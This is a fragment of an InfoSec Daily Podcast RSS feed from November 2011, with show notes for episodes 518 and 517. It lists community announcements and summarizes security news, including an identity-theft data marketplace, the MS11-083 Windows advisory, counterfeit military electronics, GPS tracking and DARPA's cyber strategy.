People ignore us, hate us, or perceive us as roadblocks. Or all three.
Infosec never seems to be &#8220;done&#8221;, ever. Always an ongoing endeavor.
The landscape in infosec changes so rapidly it&#8217;s difficult to keep up.
Overall, infosec is &#8220;hard&#8221;.
Related to the first point in this list, we may feel &#8220;at odds&#8221; with business units and IT organizations.
There&#8217;s a general sense of &#8220;futility&#8221; &#8211; we can&#8217;t &#8220;win&#8221;.
Our career paths are wack &#8211; do we really have any respect?
</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>yes</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 518 &#8211; Badguys Walmart, MS11-083, Fake Circuitry, Random Tracking &amp; Cyber Arms Race</title>
		<link>http://www.isdpodcast.com/episode-518-badguys-walmart-ms11-083-fake-circuitry-random-tracking-cyber-arms-race</link>
		<comments>http://www.isdpodcast.com/episode-518-badguys-walmart-ms11-083-fake-circuitry-random-tracking-cyber-arms-race#comments</comments>
		<pubDate>Thu, 10 Nov 2011 01:49:35 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3113</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 518 for November 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Keith Pachulski, and Varun Sharma. Announcements: Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 518 for November 14, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Keith Pachulski, and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://boingboing.net/2011/11/08/identity-theft-marketplace-sells-mothers-maiden-names-dates-of-birth-etc.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">boingboing.net/2011/11/08/identity-theft-marketplace-sells-mothers-maiden-names-dates-of-birth-etc.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many websites will allow you to &quot;recover a lost password&quot; if you (or a crook) can supply your date of birth, mother&#39;s maiden name, etc. So, of course, crooks buy and sell data like dates of birth, mothers&#39; maiden names, Social Security Numbers, and other easily mined minutae. Brian Krebs reports from superget.info, a site that sells would-be fraudsters this information, and also has a wholesale program so that entrepreneurial crooks can resell your personal information to their friends.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Superget lets users search for specific individuals by name, city, and state. Each &ldquo;credit&rdquo; costs USD$1, and a successful hit on a Social Security number or date of birth costs 3 credits each. The more credits you buy, the cheaper the searches are per credit: Six credits cost $4.99; 35 credits cost $20.99, and $100.99 buys you 230 credits. Customers with special needs to can avail themselves of the &ldquo;reseller plan,&rdquo; which promises 1,500 credits for $500.99, and 3,500 credits for $1000.99.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Our Databases are updated EVERY DAY,&rdquo; the site&rsquo;s owner enthuses. &ldquo;About 99% nearly 100% US people could be found, more than any sites on the internet now.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Customers who aren&rsquo;t choosy about the identities they&rsquo;re stealing can get a real bargain. Among the most trafficked commodities in the hacker underground are packages called &ldquo;fullz infos,&rdquo; which include the full identity information on dozens or hundreds of individuals. </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://technet.microsoft.com/en-us/security/bulletin/ms11-083"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://technet.microsoft.com/en-us/security/bulletin/ms11-083</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker sends a continuous flow of specially crafted UDP packets to a closed port on a target system.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This security update is rated Critical for all supported editions of Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. For more information, see the subsection, </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Affected and Non-Affected Software</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, in this section.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The security update addresses the vulnerability by modifying the way that the Windows TCP/IP stack keeps track of UDP packets within memory. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vulnerability Information</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Recommendation.</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://hackaday.com/2011/11/08/counterfeit-electronics-in-military-weapons/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://hackaday.com/2011/11/08/counterfeit-electronics-in-military-weapons/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Boeng and the US military found some systems on new P-8 Posiedons to be defective. The culprit: counterfeit electronics. These are scrap parts from 80s-90s electronics that have been re-branded and sold to the government as new. &nbsp;Many of the parts have been linked to dealers in China, but the Chinese government feels no need to pursue this(according to the article).</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There is an amendment to a defense operation bill in the works that requires all parts from china to undergo rigorous inspection and testing before installation. &nbsp;Regardless of your stance on military action or military spending or whatever political aspect you want to connect this with, we can all agree that dangerous things designed to destroy stuff and kill people should not have defective electrics, right?</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.wired.com/threatlevel/2011/11/gps-tracker-times-two"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2011/11/gps-tracker-times-two</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As the Supreme Court gets ready to hear oral arguments in a case Tuesday that could determine if authorities can track U.S. citizens with GPS vehicle trackers without a warrant, a young man in California has come forward to Wired to reveal that he found not one but two different devices on his vehicle recently.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The 25-year-old resident of San Jose, California, says he found the first one about three weeks ago on his Volvo SUV while visiting his mother in Modesto, about 80 miles northeast of San Jose. After contacting Wired and allowing a photographer to snap pictures of the device, it was swapped out and replaced with a second tracking device. A witness also reported seeing a strange man looking beneath the vehicle of the young man&rsquo;s girlfriend while her car was parked at work, suggesting that a tracking device may have been retrieved from her car.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.reuters.com/article/2011/11/07/us-cyber-usa-offensive-idUSTRE7A640520111107"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.reuters.com/article/2011/11/07/us-cyber-usa-offensive-idUSTRE7A640520111107</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The military needs &quot;more and better options&quot; to meet cyber threats to a growing range of industrial and other systems controlled by computers vulnerable to penetration, including cars, Regina Dugan, director of the Defense Advanced Research Projects Agency, told a first-of-its kind conference.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Modern warfare will demand the effective use of cyber, kinetic and combined cyber and kinetic means,&quot; she said. Kinetic is military parlance for traditional ways of fighting such as dropping bombs, firing missiles and rolling tanks in.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dugan&#39;s agency, known as DARPA, opened the session to what it called &quot;visionary hackers&quot; as well as academics and others in an effort to &quot;change the dynamic of cyber defense&quot; amid mounting U.S. concern over vulnerabilities of networks and computer-controlled hardware.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Office of the National Counterintelligence Executive, a U.S. government body, said in a report to Congress last week that China and Russia are using cyber espionage to steal U.S. trade and technology secrets to bolster their fortunes at U.S. expense.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DARPA officials told the session that a recent in-house analysis had found that layered U.S. defenses alone, as currently configured, were a losing proposition because of a cyber attacker&#39;s lopsided advantage.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The cost of creating software security packages, some now involving up to 10 million lines of code, has soared in the past 20 years, the agency&#39;s survey found, while malicious software still requires only 125 lines on average.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-518-badguys-walmart-ms11-083-fake-circuitry-random-tracking-cyber-arms-race/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3113/0/infosec-daily-podcast-episode-518.mp3" length="17481078" type="audio/mpeg" />
		<itunes:duration>0:36:22</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 518 for November 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Keith Pachulski, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 518 for November 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Keith Pachulski, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	BSides Delaware
	When: November 12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: boingboing.net/2011/11/08/identity-theft-marketplace-sells-mothers-maiden-names-dates-of-birth-etc.html
	Many websites will allow you to &#34;recover a lost password&#34; if you (or a crook) can supply your date of birth, mother&#39;s maiden name, etc. So, of course, crooks buy and sell data like dates of birth, mothers&#39; maiden names, Social Security Numbers, and other easily mined minutae. Brian Krebs reports from superget.info, a site that sells would-be fraudsters this information, and also has a wholesale program so that entrepreneurial crooks can resell your personal information to their friends.
	Superget lets users search for specific individuals by name, city, and state. Each &#8220;credit&#8221; costs USD$1, and a successful hit on a Social Security number or date of birth costs 3 credits each. The more credits you buy, the cheaper the searches are per credit: Six credits cost $4.99; 35 credits cost $20.99, and $100.99 buys you 230 credits. Customers with special needs to can avail themselves of the &#8220;reseller plan,&#8221; which promises 1,500 credits for $500.99, and 3,500 credits for $1000.99.
	&#8220;Our Databases are updated EVERY DAY,&#8221; the site&#8217;s owner enthuses. &#8220;About 99% nearly 100% US people could be found, more than any sites on the internet now.&#8221;
	Customers who aren&#8217;t choosy about the identities they&#8217;re stealing can get a real bargain. Among the most trafficked commodities in the hacker underground are packages called &#8220;fullz infos,&#8221; which include the full identity information on dozens or hundreds of individuals. 
	Source: https://technet.microsoft.com/en-us/security/bulletin/ms11-083
	This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker sends a continuous flow of specially crafted UDP packets to a closed port on a target system.
	This security update is rated Critical for all supported editions of Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. For more information, see the subsection, Affected and Non-Affected Software, in this section.
	The security update addresses the vulnerability by modifying the way that the Windows TCP/IP stack keeps track of UDP packets within memory. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.
	Recommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 517 &#8211; Lob the Lobbyists, Top 125, Fallguy For Hire, Goodbye Charlie, Sandbox or GTFO &amp; Privacy is Not Profitable</title>
		<link>http://www.isdpodcast.com/episode-517-lob-the-lobbyists-top-125-fallguy-for-hire-goodbye-charlie-sandbox-or-gtfo-privacy-is-not-profitable</link>
		<comments>http://www.isdpodcast.com/episode-517-lob-the-lobbyists-top-125-fallguy-for-hire-goodbye-charlie-sandbox-or-gtfo-privacy-is-not-profitable#comments</comments>
		<pubDate>Wed, 09 Nov 2011 01:44:59 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3097</guid>
		<description><![CDATA[&#160;InfoSec Daily Podcast Episode 517 for November 8, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan (aka Shit Eye), Themson Mester, and Varun Sharma. Announcements: Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 517 for November 8, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan (aka Shit Eye), Themson Mester, and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 12, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.politico.com/news/stories/1111/67603.html"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.politico.com/news/stories/1111/67603.html</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google is considering ditching the U.S. Chamber of Commerce out of frustration with its support for legislation that would force Internet companies to police websites that peddle pirated movies and fake Viagra.</span></p>
